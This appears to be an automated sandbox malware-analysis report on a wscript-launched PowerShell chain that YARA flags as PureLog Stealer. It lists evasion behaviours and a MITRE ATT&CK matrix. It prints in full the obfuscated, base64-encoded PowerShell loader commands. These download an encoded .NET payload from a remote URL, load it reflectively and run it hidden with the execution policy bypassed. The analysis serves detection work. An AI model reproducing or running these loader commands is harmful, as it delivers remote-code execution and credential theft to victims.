              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1473Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1848Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3165Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6653Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep count: 3165 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796Thread sleep count: 6653 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824Thread sleep time: -18446744073709540s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 00000004.00000002.1851044596.000001C46D730000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Bypasses PowerShell execution policy
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6JysnRnJvbUJhc2UnKyc2JysnNFN0cmluZygnKyc3JysnOWRiYXNlNjRDb250ZW50KTs3JysnOWQnKydhc3NlbWInKydseSA9IFtSJysnZWYnKydsJysnZWN0aScrJ29uLkEnKydzJysnc2VtYmx5XTo6TG9hZCg3OWRiaW5hcicrJ3lDbycrJ250ZW50KScrJzsnKyc3OScrJ2R0eXBlID0nKycgNzlkJysnYXNzZW1ibCcrJ3kuR2V0VCcrJ3lwZShLJysncWonKydSJysndW5QRScrJy5Ib21lJysnS3FqKTsnKyc3OWRtJysnZXRob2QgPSAnKyc3OWR0eScrJ3AnKydlLkcnKydldE1ldGhvJysnZCgnKydLcScrJ2onKydWQUlLcScrJ2opOzc5ZG1ldGhvZC5JbnZvJysna2UoNzlkJysnbnUnKydsbCwnKycgW29iamVjJysndFtdXScrJ0AoS3FqJysndHgnKyd0LkhUT01SLzAzMS84NDIuODQxLjI3MS43MDEvLycrJzpwdHRoSycrJ3FqICwgS3FqJysnZGUnKydzYXRpdicrJ2Fkb0txaiAsIEtxamRlc2F0aXZhZCcrJ29LcWonKycgLCBLcWpkZScrJ3NhdGl2YWRvS3FqLEtxalJlZ0EnKydzbUtxaicrJywnKydLJysncWpLcScrJ2onKycpKScpLlJFUGxBY2UoKFtjaGFyXTU1K1tjaGFyXTU3K1tjaGFyXTEwMCksJyQnKS5SRVBsQWNlKChbY2hhcl03NStbY2hhcl0xMTMrW2NoYXJdMTA2KSxbc3RySW5nXVtjaGFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlTnY6Q29tU3BlQ1s0LDI0LDI1XS1qb2luJycpICgoJzc5JysnZHVybCA9JysnIEtxamh0JysndHBzJysnOi8vaWE2MDAxMDAuJysndXMuJysnYXJjaGl2ZS5vcmcvJysnMjQvaXRlbXMvZGUnKyd0YWgtbm90ZS12L0RlJysndGFoTicrJ290ZScrJ1YudHh0S3FqJysnOzcnKyc5ZGJhc2U2NENvbnRlbicrJ3QgJysnPScrJyAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYicrJ0NsaWUnKydudCkuRG93bmxvYScrJ2RTdHJpbmcoNzlkdScrJ3JsKTs3JysnOWRiaW5hJysncnknKydDb250JysnZW50ID0nKycgJysnW1N5Jysnc3RlbS5DbycrJ24nKyd2ZXJ0JysnXTo6JysnRnJvbUJhc2UnKyc2JysnNFN0cmluZygnKyc3JysnOWRiYXNlNjRDb250ZW50KTs3JysnOWQnKydhc3NlbWInKydseSA9IFtSJysnZWYnKydsJysnZWN0aScrJ29uLkEnKydzJysnc2VtYmx5XTo6TG9hZCg3OWRiaW5hcicrJ3lDbycrJ250ZW50KScrJzsnKyc3OScrJ2R0eXBlID0nKycgNzlkJysnYXNzZW1ibCcrJ3kuR2V0VCcrJ3lwZShLJysncWonKydSJysndW5QRScrJy5Ib21lJysnS3FqKTsnKyc3OWRtJysnZXRob2QgPSAnKyc3OWR0eScrJ3AnKydlLkcnKydldE1ldGhvJysnZCgnKydLcScrJ2onKydWQUlLcScrJ2opOzc5ZG1ldGhvZC5JbnZvJysna2UoNzlkJysnbnUnKydsbCwnKycgW29iamVjJysndFtdXScrJ0AoS3FqJysndHgnKyd0LkhUT01SLzAzMS84NDIuODQxLjI3MS43MDEvLycrJzpwdHRoSycrJ3FqICwgS3FqJysnZGUnKydzYXRpdicrJ2Fkb0txaiAsIEtxamRlc2F0aXZhZCcrJ29LcWonKycgLCBLcWpkZScrJ3NhdGl2YWRvS3FqLEtxalJlZ0EnKydzbUtxaicrJywnKydLJysncWpLcScrJ2onKycpKScpLlJFUGxBY2UoKFtjaGFyXTU1K1tjaGFyXTU3K1tjaGFyXTEwMCksJyQnKS5SRVBsQWNlKChbY2hhcl03NStbY2hhcl0xMTMrW2NoYXJdMTA2KSxbc3RySW5nXVtjaGFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $eNv:ComSpeC[4,24,25]-join'') (('79'+'durl ='+' Kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/De'+'tahN'+'ote'+'V.txtKqj'+';7'+'9dbase64Conten'+'t '+'='+' (New-Object System.Net.W'+'eb'+'Clie'+'nt).Downloa'+'dString(79du'+'rl);7'+'9dbina'+'ry'+'Cont'+'ent ='+' '+'[Sy'+'stem.Co'+'n'+'vert'+']::'+'FromBase'+'6'+'4String('+'7'+'9dbase64Content);7'+'9d'+'assemb'+'ly = [R'+'ef'+'l'+'ecti'+'on.A'+'s'+'sembly]::Load(79dbinar'+'yCo'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.GetT'+'ype(K'+'qj'+'R'+'unPE'+'.Home'+'Kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.G'+'etMetho'+'d('+'Kq'+'j'+'VAIKq'+'j);79dmethod.Invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(Kqj'+'tx'+'t.HTOMR/031/842.841.271.701//'+':ptthK'+'qj , Kqj'+'de'+'sativ'+'adoKqj , Kqjdesativad'+'oKqj'+' , Kqjde'+'sativadoKqj,KqjRegA'+'smKqj'+','+'K'+'qjKq'+'j'+'))').REPlAce(([char]55+[char]57+[char]100),'$').REPlAce(([char]75+[char]113+[char]106),[strIng][char]39) )"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiaoicrltny6q29tu3blq1s0ldi0ldi1xs1qb2lujycpicgojzc5jysnzhvybca9jysnietxamh0jysndhbzjysnoi8vawe2mdaxmdaujysndxmujysnyxjjagl2zs5vcmcvjysnmjqvaxrlbxmvzgunkyd0ywgtbm90zs12l0rljysndgfoticrj290zscrj1yudhh0s3fqjysnozcnkyc5zgjhc2u2nenvbnrlbicrj3qgjysnpscrjyaotmv3lu9iamvjdcbtexn0zw0utmv0llcnkydlyicrj0nsawunkydudckurg93bmxvyscrj2rtdhjpbmconzlkdscrj3jskts3jysnowriaw5hjysncnknkyddb250jysnzw50id0nkycgjysnw1n5jysnc3rlbs5dbycrj24nkyd2zxj0jysnxto6jysnrnjvbujhc2unkyc2jysnnfn0cmluzygnkyc3jysnowriyxnlnjrdb250zw50kts3jysnowqnkydhc3nlbwinkydsesa9iftsjysnzwynkydsjysnzwn0ascrj29ulkenkydzjysnc2vtymx5xto6tg9hzcg3owriaw5hcicrj3ldbycrj250zw50kscrjzsnkyc3oscrj2r0exblid0nkycgnzlkjysnyxnzzw1ibccrj3kur2v0vccrj3lwzshljysncwonkydsjysndw5qrscrjy5ib21ljysns3fqktsnkyc3owrtjysnzxrob2qgpsankyc3owr0escrj3ankydllkcnkydlde1ldghvjysnzcgnkydlcscrj2onkydwqullcscrj2opozc5zg1ldghvzc5jbnzvjysna2uonzlkjysnbnunkydsbcwnkycgw29iamvjjysndftdxscrj0aos3fqjysndhgnkyd0lkhut01slzazms84ndiuodqxlji3ms43mdevlycrjzpwdhrosycrj3fqicwgs3fqjysnzgunkydzyxrpdicrj2fkb0txaiasietxamrlc2f0axzhzccrj29lcwonkycglcblcwpkzscrj3nhdgl2ywrvs3fqletxaljlz0enkydzbutxaicrjywnkydljysncwplcscrj2onkycpkscplljfugxby2uokftjagfyxtu1k1tjagfyxtu3k1tjagfyxtewmcksjyqnks5srvbsqwnlkchby2hhcl03nstby2hhcl0xmtmrw2noyxjdmta2ksxbc3rysw5nxvtjagfyxtm5ksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ( $env:comspec[4,24,25]-join'') (('79'+'durl ='+' kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/de'+'tahn'+'ote'+'v.txtkqj'+';7'+'9dbase64conten'+'t '+'='+' (new-object system.net.w'+'eb'+'clie'+'nt).downloa'+'dstring(79du'+'rl);7'+'9dbina'+'ry'+'cont'+'ent ='+' '+'[sy'+'stem.co'+'n'+'vert'+']::'+'frombase'+'6'+'4string('+'7'+'9dbase64content);7'+'9d'+'assemb'+'ly = [r'+'ef'+'l'+'ecti'+'on.a'+'s'+'sembly]::load(79dbinar'+'yco'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.gett'+'ype(k'+'qj'+'r'+'unpe'+'.home'+'kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.g'+'etmetho'+'d('+'kq'+'j'+'vaikq'+'j);79dmethod.invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(kqj'+'tx'+'t.htomr/031/842.841.271.701//'+':ptthk'+'qj , kqj'+'de'+'sativ'+'adokqj , kqjdesativad'+'okqj'+' , kqjde'+'sativadokqj,kqjrega'+'smkqj'+','+'k'+'qjkq'+'j'+'))').replace(([char]55+[char]57+[char]100),'$').replace(([char]75+[char]113+[char]106),[string][char]39) )"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiaoicrltny6q29tu3blq1s0ldi0ldi1xs1qb2lujycpicgojzc5jysnzhvybca9jysnietxamh0jysndhbzjysnoi8vawe2mdaxmdaujysndxmujysnyxjjagl2zs5vcmcvjysnmjqvaxrlbxmvzgunkyd0ywgtbm90zs12l0rljysndgfoticrj290zscrj1yudhh0s3fqjysnozcnkyc5zgjhc2u2nenvbnrlbicrj3qgjysnpscrjyaotmv3lu9iamvjdcbtexn0zw0utmv0llcnkydlyicrj0nsawunkydudckurg93bmxvyscrj2rtdhjpbmconzlkdscrj3jskts3jysnowriaw5hjysncnknkyddb250jysnzw50id0nkycgjysnw1n5jysnc3rlbs5dbycrj24nkyd2zxj0jysnxto6jysnrnjvbujhc2unkyc2jysnnfn0cmluzygnkyc3jysnowriyxnlnjrdb250zw50kts3jysnowqnkydhc3nlbwinkydsesa9iftsjysnzwynkydsjysnzwn0ascrj29ulkenkydzjysnc2vtymx5xto6tg9hzcg3owriaw5hcicrj3ldbycrj250zw50kscrjzsnkyc3oscrj2r0exblid0nkycgnzlkjysnyxnzzw1ibccrj3kur2v0vccrj3lwzshljysncwonkydsjysndw5qrscrjy5ib21ljysns3fqktsnkyc3owrtjysnzxrob2qgpsankyc3owr0escrj3ankydllkcnkydlde1ldghvjysnzcgnkydlcscrj2onkydwqullcscrj2opozc5zg1ldghvzc5jbnzvjysna2uonzlkjysnbnunkydsbcwnkycgw29iamvjjysndftdxscrj0aos3fqjysndhgnkyd0lkhut01slzazms84ndiuodqxlji3ms43mdevlycrjzpwdhrosycrj3fqicwgs3fqjysnzgunkydzyxrpdicrj2fkb0txaiasietxamrlc2f0axzhzccrj29lcwonkycglcblcwpkzscrj3nhdgl2ywrvs3fqletxaljlz0enkydzbutxaicrjywnkydljysncwplcscrj2onkycpkscplljfugxby2uokftjagfyxtu1k1tjagfyxtu3k1tjagfyxtewmcksjyqnks5srvbsqwnlkchby2hhcl03nstby2hhcl0xmtmrw2noyxjdmta2ksxbc3rysw5nxvtjagfyxtm5ksap';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ( $env:comspec[4,24,25]-join'') (('79'+'durl ='+' kqjht'+'tps'+'://ia600100.'+'us.'+'archive.org/'+'24/items/de'+'tah-note-v/de'+'tahn'+'ote'+'v.txtkqj'+';7'+'9dbase64conten'+'t '+'='+' (new-object system.net.w'+'eb'+'clie'+'nt).downloa'+'dstring(79du'+'rl);7'+'9dbina'+'ry'+'cont'+'ent ='+' '+'[sy'+'stem.co'+'n'+'vert'+']::'+'frombase'+'6'+'4string('+'7'+'9dbase64content);7'+'9d'+'assemb'+'ly = [r'+'ef'+'l'+'ecti'+'on.a'+'s'+'sembly]::load(79dbinar'+'yco'+'ntent)'+';'+'79'+'dtype ='+' 79d'+'assembl'+'y.gett'+'ype(k'+'qj'+'r'+'unpe'+'.home'+'kqj);'+'79dm'+'ethod = '+'79dty'+'p'+'e.g'+'etmetho'+'d('+'kq'+'j'+'vaikq'+'j);79dmethod.invo'+'ke(79d'+'nu'+'ll,'+' [objec'+'t[]]'+'@(kqj'+'tx'+'t.htomr/031/842.841.271.701//'+':ptthk'+'qj , kqj'+'de'+'sativ'+'adokqj , kqjdesativad'+'okqj'+' , kqjde'+'sativadokqj,kqjrega'+'smkqj'+','+'k'+'qjkq'+'j'+'))').replace(([char]55+[char]57+[char]100),'$').replace(([char]75+[char]113+[char]106),[string][char]39) )"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected PureLog Stealer
              Source: Yara matchFile source: 4.2.powershell.exe.1c4663f0ed8.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.powershell.exe.1c4663f0ed8.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.powershell.exe.1c46ddf0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.powershell.exe.1c46ddf0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.1853253841.000001C46DDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1834352585.000001C465BDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Yara detected PureLog Stealer
              Source: Yara matchFile source: 4.2.powershell.exe.1c4663f0ed8.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.powershell.exe.1c4663f0ed8.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.powershell.exe.1c46ddf0000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.powershell.exe.1c46ddf0000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.1853253841.000001C46DDF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1834352585.000001C465BDC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting              		Valid Accounts11
              Command and Scripting Interpreter              		221
              Scripting              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping1
              Security Software Discovery              		Remote ServicesData from Local System1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Exploitation for Client Execution              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		21
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts3
              PowerShell              		Logon Script (Windows)Logon Script (Windows)11
              Process Injection              		Security Account Manager21
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Deobfuscate/Decode Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture3
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
              Obfuscated Files or Information              		LSA Secrets1
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Software Packing              		Cached Domain Credentials12
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
